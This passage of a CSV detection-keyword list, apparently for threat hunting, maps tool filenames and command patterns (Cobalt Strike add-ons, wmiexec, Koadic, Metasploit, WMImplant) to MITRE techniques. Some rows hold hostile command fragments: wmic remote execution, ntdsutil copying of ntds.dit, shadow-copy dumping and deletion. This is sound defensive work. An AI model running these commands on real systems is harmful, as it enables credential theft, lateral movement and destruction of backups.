Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wireshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False 
positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Wireshark*.dmg*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wireshark-*.tar.xz*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wireshark-common*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wireshark-dev*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wireshark-gtk*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*WiresharkPortable64*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wireshark-qt*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - 
T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Wireshark-win*.exe*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wiresocks-main*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
+"*wiresocks-redsocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
+"*Witness.py*","offensive_tool_keyword","EyeWitness","EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. 
and lets you provide the max time to wait when trying to render and screenshot a web page.","T1564 - T1518 - T1210 - T1514 - T1552","TA0002 - TA0007","N/A","N/A","Information Gathering","https://github.com/FortyNorthSecurity/EyeWitness","1","1","N/A","N/A","10","4415","812","2023-10-04T20:05:31Z","2014-02-26T16:23:25Z"
+"*WitnessMe*","offensive_tool_keyword","WitnessMe","WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.","T1210.001 - T1593.001 - T1593.002","TA0010 - ","N/A","N/A","Information Gathering","https://github.com/byt3bl33d3r/WitnessMe","1","1","N/A","N/A","7","689","109","2022-12-08T11:04:13Z","2019-07-06T05:25:10Z"
+"*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z"
+"*WKL-Sec/dcomhijack*","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","10","3","229","23","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z"
+"*WKL-Sec/HiddenDesktop*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*WKL-Sec/Winsocky*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","80","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z"
+"*wkssvc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell 
hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z"
+"*WldpBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*wl-lic -d *.dat -r *.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z"
+"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*wmeye.csproj*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z"
+"*wmeye.exe *","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z"
+"*wmeye.sln*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z"
+"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z"
+"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*wmic /* /user:administrator process call create *cmd.exe /c *","greyware_tool_keyword","wmic","Lateral Movement with wmic","T1078 - T1028 - T1106 - T1105","TA0002 - TA0004","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*wmic process call create*ntdsutil *ac i ntds* ifm*create full*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wmic SHADOWCOPY /nointeractive*","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. 
Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wmic shadowcopy call create Volume='C:\'*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wmic useraccount get /ALL /format:csv*","greyware_tool_keyword","wmic","User Enumeration","T1087 - T1033","TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*wmic*/Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName*","greyware_tool_keyword","wmic","list AV products with wmic","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A"
+"*wmic.exe process call create *.txt:*.exe*","greyware_tool_keyword","wmic","Execute a .EXE file stored as an Alternate Data Stream (ADS)","T1105 - T1027.001 - T1096 - T1036","TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z"
+"*wmic.exe* Shadowcopy Delete*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat 
ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*wmic/wmic.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*WMIcmd*","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","4","324","85","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z"
+"*WMICStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*wmi-event-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*WMI-EventSub.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*wmiexec *.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A"
+"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z"
+"*wmiexec.py -*","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z"
+"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z"
+"*wmiexec2.0.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*wmiexec2.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*wmiexec2-main*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*WMIExecHash.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*WMIExecHash.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z"
+"*wmiexec-Pro.git*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*wmiexec-pro.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z"
+"*wmi-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*WMImplant*","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. 
WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","767","152","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z"
